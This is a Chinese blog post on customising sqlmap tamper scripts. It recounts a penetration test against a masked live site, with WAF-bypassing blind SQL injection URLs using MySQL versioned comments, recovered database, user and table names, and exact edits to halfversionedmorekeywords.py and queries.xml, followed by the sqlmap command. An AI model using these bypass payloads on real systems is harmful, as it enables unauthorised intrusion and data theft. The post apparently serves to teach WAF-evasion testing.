定制sqlmap tamper脚本

最新推荐文章于 2024-01-31 07:18:14 发布
最新推荐文章于 2024-01-31 07:18:14 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 技术分享 文章标签: s'

前言

渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了。

测试

在测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接403了。

测试了其他的一些参数,发现过滤了大部分的注入命令,但是可以利用mysql的注释方法进行绕过,例如网站会拦截sleep()函数,可以利用/!50000sleep(5)/绕过拦截,接上url试试:

http://**.com/lightapp/detail.php?qid=17364076 and /*!50000sleep(5)*/

发现会sleep几秒 :),看来是存在sql注入的,先获取下数据库的长度:

http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/length(database())=1 
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/length(database())=2 
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/length(database())=3 
... 
http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/length(database())=8

到8的时候网页返回正确,可以获取到当前的数据库长度为8,继续往下猜:

http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/left(database(),8)=CHAR(115,105,116,101,100,97,116,97)

最终猜出的数据库名为:

sitedata

可以使用如下语句得出当前数据库用户为:

mysql_data@192.168.113.8 

http://**.com/lightapp/detail.php?qid=17364076/*!50000and*/left(user(),23)=CHAR(109,121,115,113,108,95,100,97,116,97,64, 49,57,50,46,49,54,56,46,49,49,51,46,56)

查询当前数据库的第一个表名的长度可以使用语句:

http://**.com/lightapp/detail.php?qid=17364076/*!and*/length((select/*!50000table_name*//*!from*//*!information_schema.t ables*/limit+0,1))=13

得出第一个数据表名的长度为13,试查询第二个数据表的表名,使用语句:

http://**.com/lightapp/detail.php?qid=17364076/*!and*/left((select/*!50000table_name*//*!from*//*!information_schema.tab les*/limit+1,1),1)=char(99)

使用上述语句得到表名第一个字符的ascii码,依次类推:

http://**.com/lightapp/detail.php?qid=17364076/*!and*/left((select/*!50000table_name*//*!from*//*!information_schema.tab les*/limit+1,1),17)=char(99,108,105,101,110,116,95,117,115,101,114,110,97,109,101,100,98)

得到第二个数据表的表名为

client_usernamedb

依次类推变可查询到所有数据。

修改Sqlmap tamper

\sqlmap\tamper目录

apostrophemask.py
apostrophenullencode.py
appendnullbyte.py
base64encode.py
between.py
bluecoat.py
chardoubleencode.py
charencode.py
charunicodeencode.py
commalesslimit.py
commalessmid.py
concat2concatws.py
equaltolike.py
escapequotes.py
greatest.py
halfversionedmorekeywords.py
htmlencode.py
ifnull2ifisnull.py
informationschemacomment.py
lowercase.py
modsecurityversioned.py
modsecurityzeroversioned.py
multiplespaces.py
nonrecursivereplacement.py
overlongutf8.py
percentage.py
plus2concat.py
randomcase.py
randomcomments.py
securesphere.py
space2comment.py
space2dash.py
space2hash.py
space2morehash.py
space2mssqlblank.py
space2mssqlhash.py
space2mysqlblank.py
space2mysqldash.py
space2plus.py
space2randomblank.py
sp_password.py
symboliclogical.py
unionalltounion.py
unmagicquotes.py
uppercase.py
varnish.py
versionedkeywords.py
versionedmorekeywords.py
xforwardedfor.py

可惜的是没有合适本次注入点的脚本。

下面利用halfversionedmorekeywords.py这个脚本做修改,即可绕过上面的注入,看一下脚本中注释部分:

\sqlmap\tamper\halfversionedmorekeywords.py
38行

>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")

修改为:

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0 CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

可以看到这个脚本所实现的效果是替换空格和关键字为/*!0,可将脚本的第45行:

return match.group().replace(word, "/*!0%s" % word)

修改为:

return match.group().replace(word, "/*!50000%s*/" % word)

可以绕过第一步拦截,接着将sqlmap其他提交payload的地方进行修改,程序只要将关键字进行/!50000关键字/就会绕过拦截,这个注入同时会拦截cast函数,可将其改成convert函数也可以绕过拦截,sqlmap/xml/queries.xml改为convert(%s,CHAR),dbms一定要对应相同类型的数据库,代码如下:

<?xml version="1.0" encoding="UTF-8"?>   
<root>
     <!-- MySQL -->
    <dbms value="MySQL">
         <cast query="CAST(%s AS CHAR)"/>
         <length query="CHAR_LENGTH(%s)"/>
         <isnull query="IFNULL(%s,' ')"/>
         <delimiter query=","/>
         <limit query="LIMIT %d,%d"/>

Cast部分修改为:

<cast query="convert(%s,CHAR)"/>

为了让读者更加理解为什么要在这里修改,推荐读者看一篇文章:

Python:Sqlmap源码精读之解析xml

改完后执行:

python sqlmap.py -u "http://**.com/lightapp/detail.php?qid=17364076" –tamper "halfversionedmorekeywords.py"

总结

简单的总结下,Sqlmap tamper提供了很多的demo,我们可以根据实际情况进行相应的修改应用即可。

大方子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap tamper脚本注释
小明师傅博客
06-03 569
apostrophemask.py 用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py 在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BE..
sqlmap 使用tamper脚本绕过WAF
最新发布
xf3401837266的博客
05-22 732
sqlmap 使用tamper脚本绕过WAF
SQLMapTamper脚本
m0_62207482的博客
01-31 2957
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
使用sqlmaptamper脚本绕过waf
xysoul的专栏
05-29 1628
0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名:apo
3 、Sqlmap Tamper脚本分析(MSSQL)-01
09-15
Sqlmap Tamper脚本分析(MSSQL) Sqlmap Tamper脚本是一种特殊的脚本,用于绕过Web应用程序的防火墙和入侵检测系统,以便进行SQL injection攻击。Tamper脚本可以对payload进行修改,使其能够绕过安全防护机制。下面...
1、Sqlmap Tamper脚本编写介绍-01
09-15
Sqlmap Tamper脚本编写介绍 Sqlmap Tamper脚本是对Sqlmap工具的扩展,主要功能是对原本的payload进行特定的更改以绕过WAF。Tamper脚本结构主要包括三个部分:Tamper脚本结构介绍、Tamper函数介绍和dependencies函数...
sqlmap绕过过滤的 tamper 脚本分类汇总
10-19
sqlmap绕过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
sqlmap的高级使用-tamper脚本使用、os-shell原理等
weixin_46626737的博客
07-11 703
(10)concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例。(5)between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=(14)ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例。
手把手教你编写SQLMapTamper脚本过狗
蚁景网安学院
02-22 593
https://xz.aliyun.com/t/11412sql注入bypass最新版某狗 (qq.com)奇安信攻防社区-记一次实战过狗注入 (butian.net)https://www.freebuf.com/sectool/179035.html本文仅用于技术讨论与学习测试环境最新版某狗测试方法安全狗其实是比较好绕的WAF,绕过方法很多,但这里我们就用一种:注释混淆一招鲜吃遍天注释混淆,其...
sqlmaptamper的用法
路虽远,行将至。事虽难,做必达。
03-09 1万+
sqlmap部分脚本用法说明 1、apostrophemask.py 适用数据库:ALL 作用:将引号替换为utf-8,用于过滤单引号 使用脚本前:tamper("1 AND '1'='1") 使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 2、base64encode.py 适用数据库:ALL 作用:替换base64编码 使用脚本前:tamper("1' AND SLEEP(5)#") 使用脚本后:MScgQU5EIFNMRUVQKDUpIw==
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
Sqlmap Tamper编写
qq_41741127的博客
10-06 1860
Sqlmap Tamper编写 Sqlmap Tampersqlmap可以调用的脚本,已进行对payload的修改,如:双写、替换空格、编码等。 sqlmap可以使用--tamper调用,编写使用Python。 from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): pass def tamper(payload, **kwargs): return payload
SQLMAP --TAMPER的编写
m0_64180167的博客
11-17 322
这里的tamper 其实就是多个绕过waf的插件 通过编写tamper 我们可以学会。增加过滤 将这些替换为空 这里其实我们本身已经知道如何注入了 双写绕过即可。就是很简单的对payload进行操作 将所有过滤的内容实现绕过即可。这是最简单的 tamper 后续写就要按照题目来了。我们首先了解一下 tamper的结构。但是我们如何在tamper中体现呢。我们首先进行正常注入看看是否成功。这里学习一下tamper的编写。这里我们首先看一个最简单的例子。所以我们开始修改tamper。这里的例子我们可以发现。
Sqlmap Tamper 编写/改写 学习
Goodric的博客
04-26 1811
sqlmap的--tamper参数可以引入用户自定义脚本修改注入时的payload ,达到sql注入时对一些敏感字符的一些绕过
sqlmap中的tamper 脚本分析
weixin_62420492的博客
01-04 428
space2randomblank 作用:空格替换为备选字符集中的随机字符 例子: ('select id from users') ( select %0Did%0DFRM%0A users') 详细注释: #!/usr/bin/env python//此处用法为:程序到env设置里查找python的安装路径,再调用对应路径下的解释器程序完成操作 """ //python 的多行注释符 Copyright (c) 2006-2021 sqlmap developers (https://sqlmap
sqlmap的常用tamper脚本
浅笑996的博客
11-02 3062
sqlmap下的tamper目录存放绕过WAF脚本 使用方法 --tamper 脚本名称,脚本名称 多个tamper脚本之间用空格隔开 apostrophemask.py 用utf8代替引号 equaltolike.py like代替等号 space2dash.py 绕过过滤‘=...
SQLMAP 脚本自动注入应用(burpsuit辅助)
热门推荐
4ct10n
08-06 3万+
一道nctf的注入题目 具体的步骤如下: sqlmap注入命令1 sqlmap注入命令2第一步 burpsuit获取报头运用burpsuit抓包,获取http报头 GET /services.php?id=4 HTTP/1.1 Host: www.backstagecommerce.ca Cache-Control: max-age=0 Upgrade-Insecure-Requests:
sqlmap tamper
07-28
tamper脚本SQLMAP中用于绕过WAF或应对网站过滤逻辑的脚本SQLMAP自带了一些tamper脚本,可以在tamper目录下查看它们。用户也可以根据已有的tamper脚本来编写自己的tamper脚本,以实现绕过特定的逻辑。\[3\]在使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值